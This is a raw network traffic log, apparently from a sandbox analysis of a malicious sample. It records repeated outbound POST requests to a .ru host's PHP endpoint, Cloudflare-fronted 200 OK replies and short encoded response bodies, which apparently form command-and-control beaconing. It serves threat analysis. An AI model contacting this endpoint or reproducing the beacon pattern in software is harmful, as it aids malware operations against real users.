                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:29.433562040 CET 25 IN HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:29.961204052 CET 976 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:29 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vmEFVoUrR5l%2Bqmq%2B%2FJfighvPerjwrKVWZJSLw%2F%2FHic9XYC8kjkYmkbW8Tw7QPmmjmiOv7P4h%2BoGsaZuh1KWu6ZzwlUceSO%2BVIWMyqR4zoZ5ocN6C5Z2DklCSJ44zTA5eGB5Z%2BFOh"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b96fbb442cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11307&min_rtt=1677&rtt_var=8570&sent=818&recv=882&lost=0&retrans=2&sent_bytes=128134&recv_bytes=529206&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:44:29.961872101 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:30.294718027 CET 25 IN HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:30.834297895 CET 968 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:30 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yF%2F%2FhKp8bBBkAtX6Jw%2FDgmSdWzo1YdhktvREnjFAbdg3y2gnMUUWJirlR17yObZk3UrkXAnAv2gJCU9PZTPwSHafd%2FQbUOyheTooHM7pazamCHjhB5jTZ7U35CetomObUol17LZe"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940b9c592542cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10503&min_rtt=1677&rtt_var=7220&sent=824&recv=887&lost=0&retrans=2&sent_bytes=129135&recv_bytes=531612&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:44:30.837569952 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:31.170332909 CET 25 IN HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:31.697618961 CET 967 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:31 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFLS9uB1X%2BnWAIz2nCFGxFjBu4JG29tThKh2ax4AVI2DXTymz3BQkl2kyKK9nbO17Vkn0aMvrQ4nRJ9pZ%2BkEF0YYyC7x6ndspIHdBImShWXSd9AJHXx4PZ1t6d%2FoJxKx%2FlXKNlIJ"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940ba1cf3c42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9816&min_rtt=1677&rtt_var=6250&sent=830&recv=892&lost=0&retrans=2&sent_bytes=130128&recv_bytes=534018&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:44:31.698669910 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:32.031336069 CET 25 IN HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:32.566811085 CET 966 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FZ68TuamB1HBvTYZy2iogT003%2FICrAkIut5%2Fs7O92rhdxNfr%2FfnhYPmy5vP2k3RSwqcNNUyPEP3k3ekxuI3MnTxGVd1vz45YZLkuJr91pRB8CJ91tKR36519NqTtT2RcZpuLfXQS"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940ba73d1c42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11041&min_rtt=1677&rtt_var=9184&sent=836&recv=897&lost=0&retrans=2&sent_bytes=131120&recv_bytes=536424&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:44:32.570915937 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:32.903656006 CET 25 IN HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:33.435112953 CET 966 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:33 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i64yWklwGQqNh5Lr87FjOugQr2U875F4QG223ILk9BSwBRDGkzfoEgOK5%2BHSOhS8muwWEerPZAsmz8aOZ2EKJrkiUQgc%2BijI%2BPFPbURrALoqEiS0eVfaFJXpI8F7r4pa6FIdqxjo"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bacabd342cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10343&min_rtt=1677&rtt_var=7771&sent=842&recv=902&lost=0&retrans=2&sent_bytes=132111&recv_bytes=538830&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:44:33.436186075 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:34.015465975 CET 966 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:33 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i64yWklwGQqNh5Lr87FjOugQr2U875F4QG223ILk9BSwBRDGkzfoEgOK5%2BHSOhS8muwWEerPZAsmz8aOZ2EKJrkiUQgc%2BijI%2BPFPbURrALoqEiS0eVfaFJXpI8F7r4pa6FIdqxjo"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bacabd342cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10343&min_rtt=1677&rtt_var=7771&sent=842&recv=902&lost=0&retrans=2&sent_bytes=132111&recv_bytes=538830&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:44:34.229058027 CET 25 IN HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:34.439912081 CET 963 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sq1oAm93xU6Uh7Arbt8CBqKa1qSqMrDCMrZu%2BXabc6cAIMyk7yQskPXkJBiKdTjmYSmfp2uvI8mTh6jDngksBBSz4EerwvchbECsLJEnmB%2FcJNAdT4OW8QqWGGFNFG8EPvumtApS"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bb4ed2742cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8374&min_rtt=1677&rtt_var=7635&sent=847&recv=906&lost=0&retrans=2&sent_bytes=133102&recv_bytes=541236&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:44:34.442748070 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:34.778687000 CET 25 IN HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:35.306447983 CET 967 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:35 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3857Fv9kGn0vYtc%2B2ImMm485IV%2FJxPj3nuF2a91rSJ4ORAMEUHX7AkeH6g8EG8xhVmXRdm2WgM4ctxX%2FKHYedZAYM%2FIXNOMaDuioomcCXoGQ4pyIPGXBu5SQsfi5zOHdAkiYYnEj"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bb858ca42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8411&min_rtt=1677&rtt_var=7227&sent=852&recv=911&lost=0&retrans=2&sent_bytes=134090&recv_bytes=543618&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:44:35.307409048 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:35.639939070 CET 25 IN HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:36.164700031 CET 965 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uxcrTy01ddt6yKi0NeC5s26g%2Fkb%2BqmO0g9sdjLxUyYlsJwJMnWktq%2FQrLomNAbSl6meQQaN0HWgIx5ztidOvncj5P1OT287jrUY7OdSdOp3W7CODEVfJQ8Jraw7mHQ1SIkYJHqOf"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bbdbfa942cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8215&min_rtt=1677&rtt_var=6568&sent=858&recv=916&lost=0&retrans=2&sent_bytes=135082&recv_bytes=546024&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:44:36.165503025 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2088
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:36.733344078 CET 965 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uxcrTy01ddt6yKi0NeC5s26g%2Fkb%2BqmO0g9sdjLxUyYlsJwJMnWktq%2FQrLomNAbSl6meQQaN0HWgIx5ztidOvncj5P1OT287jrUY7OdSdOp3W7CODEVfJQ8Jraw7mHQ1SIkYJHqOf"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bbdbfa942cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8215&min_rtt=1677&rtt_var=6568&sent=858&recv=916&lost=0&retrans=2&sent_bytes=135082&recv_bytes=546024&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:44:36.947771072 CET 25 IN HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:37.157984018 CET 967 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EKwEzlFArgFPFbaWBZc8r38jVZzjMQYs5G4iLoRV%2BdUjfSyEbULhtl8G1M6fNGFj5hWep5N%2BWWgZcrUq2%2FNNfNadr4QW2tTHLLeXB4EN1J8nCetTGlH9ERWXLcIvv3oPSTkkN%2Bkj"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bc5e8cc42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6705&min_rtt=1677&rtt_var=6314&sent=863&recv=920&lost=0&retrans=2&sent_bytes=136072&recv_bytes=548418&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:44:37.159466982 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:37.491868019 CET 25 IN HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:38.021935940 CET 967 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:37 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XPqoGviRdgAEde4rBK%2F7XSugVkigWikiKEuEAg7CD%2BJ1F3E5qVHrMgQ%2FZyR1aFTUln0k9qMObVOMwkAaAo2GRrWSDT9WIfWF2ibicOJZ82rV%2F2uM8cSa90DpyrDjAiuMWbAsld71"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bc95cc142cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=7841&min_rtt=1677&rtt_var=7969&sent=868&recv=925&lost=0&retrans=2&sent_bytes=137064&recv_bytes=550824&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Dec 28, 2024 20:44:38.022661924 CET 306 OUT POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:38.356234074 CET 25 IN HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:38.887120008 CET 969 IN HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:38 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cx52I5lz6aARjUw59HAWb4%2BLrbVvMysZ6jbfQk94IfokGnPg4SxfSbmP07Q1R%2FiI42Hklx2%2BQDDrS1ozngmmK7wApN7mBdG1md%2BBq5AKOOvvqw%2BnVeMJRBfECzELX9vxUsBwGtxE"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bceb9da42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8081&min_rtt=1677&rtt_var=7616&sent=874&recv=930&lost=0&retrans=2&sent_bytes=138056&recv_bytes=553230&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0c 28 27 29 03 20 02 2f 0d 27 3c 07 04 2a 2e 35 59 3d 20 02 1c 29 06 30 0d 25 38 38 59 3c 28 25 1b 27 11 00 56 20 3d 02 1f 3c 3a 21 46 04 1e 21 5d 23 07 30 5b 3e 0a 21 1c 2a 2c 01 03 35 09 2a 04 26 3a 04 0a 31 01 3f 52 22 2c 24 0c 30 2c 0d 50 38 37 2a 16 3a 33 22 0d 31 3e 2c 5e 0e 12 39 53 31 20 3a 02 3c 38 17 11 24 23 2b 50 27 3b 0f 1f 26 28 20 0d 20 06 39 5c 2b 33 23 55 24 3f 38 1f 3a 5d 24 05 24 07 20 54 2a 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 (') /'<*.5Y= )0%88Y<(%'V =<:!F!]#0[>!*,5*&:1?R",$0,P87*:3"1>,^9S1 :<8$#+P';&( 9\+3#U$?8:]$$ T*!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:38.889942884 CET    306    OUT    POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:39.222229004 CET    25    IN    HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:39.748258114 CET    969    IN    HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:39 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GQZpkOPENJYyP3WNhcQoYbLntg5gIOMQ%2BtI4Fz0EtwP853UfFlVHOtxrqwiMdc9Luz0OM2O0R9PngGdT%2Fi4A8SxC7XTCq7W%2B%2BuT0YEwB6sIjhahTD4%2BIUcGUoskHyBFIJ2azvaA4"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bd42fa442cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9432&min_rtt=1677&rtt_var=9736&sent=880&recv=935&lost=0&retrans=2&sent_bytes=139050&recv_bytes=555636&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0f 2b 24 2a 10 20 05 34 11 24 3f 26 16 3d 04 39 13 2a 56 34 19 2b 38 19 51 31 38 3c 5f 3c 16 25 1a 24 3f 22 50 21 2d 20 57 2b 3a 21 46 04 1e 21 59 20 10 2c 5f 3d 33 29 52 29 3c 02 5d 22 1e 3e 06 24 14 3e 0e 31 3b 3b 10 36 3f 33 1d 33 05 30 0f 2d 34 31 02 2e 0e 0b 57 31 3e 2c 5e 0e 12 39 1b 25 1e 18 00 3c 38 18 04 27 20 16 0f 31 38 3a 00 30 5d 2c 09 37 3b 31 59 28 0e 34 0d 33 3f 38 56 2e 05 38 07 30 00 3f 0c 2a 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 +$* 4$?&=9*V4+8Q18<_<%$?"P!- W+:!F!Y ,_=3)R)<]">$>1;;6?330-41.W1>,^9%<8' 18:0],7;1Y(43?8V.80?*"!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:39.749033928 CET    306    OUT    POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2088
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:40.081526041 CET    25    IN    HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:40.563740969 CET    977    IN    HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:40 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ATjWPsg6kdH6Tz%2FxI8wRjcG9sU83DfrhDdNSc%2BOPk9Tv90gkVo8g3iK%2BzZiECR8NpHdBj6%2B3C4NV%2BnDvkQhihcOhLWMozmS%2BeHHxMF8n8qxxh4rZMxsPBvGqM%2BG9WgMJovdO%2B8Q"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bd98dbf42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10420&min_rtt=1677&rtt_var=10812&sent=885&recv=940&lost=0&retrans=2&sent_bytes=140044&recv_bytes=558030&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0e 28 24 39 06 20 05 09 0f 24 12 0c 5e 3e 2d 36 00 3d 09 23 09 29 16 15 1d 26 5e 20 59 3c 16 04 44 25 3f 31 0c 35 3d 28 1c 2b 00 21 46 04 1e 22 03 21 2e 2c 5f 3e 0d 22 0c 29 05 30 16 21 30 25 1a 27 14 39 52 27 28 24 0b 21 02 23 1e 30 3f 24 0b 2d 27 22 5d 2d 0e 0c 0d 32 14 2c 5e 0e 12 39 18 25 20 29 12 3c 3b 21 5c 33 20 2b 12 31 38 32 03 30 38 3b 55 34 28 26 07 3f 33 3b 53 33 06 38 52 2e 15 0d 5c 24 39 2b 0e 3d 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 ($9 $^>-6=#)&^ Y<D%?15=(+!F"!.,_>")0!0%'9R'($!#0?$-'"]-2,^9% )<;!\3 +18208;U4(&?3;S38R.\$9+="!^/,Q4TV0
                                                                        Dec 28, 2024 20:44:40.564562082 CET    306    OUT    POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:44:40.983867884 CET    25    IN    HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:44:41.409390926 CET    969    IN    HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:44:41 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O3HDXv81ewANcIiVvmObBESTdZmNQ%2FRfbtJqZAP%2FV%2B3HGubQ0vA90G%2FW3DMoUelMU4Epz6dYNJK05NAkuUGIZ5vslL9Xn10MgduSa2crCbsimCTeLcrgaVEFBrL89g9fKtPycWeY"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940bde9b1842cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
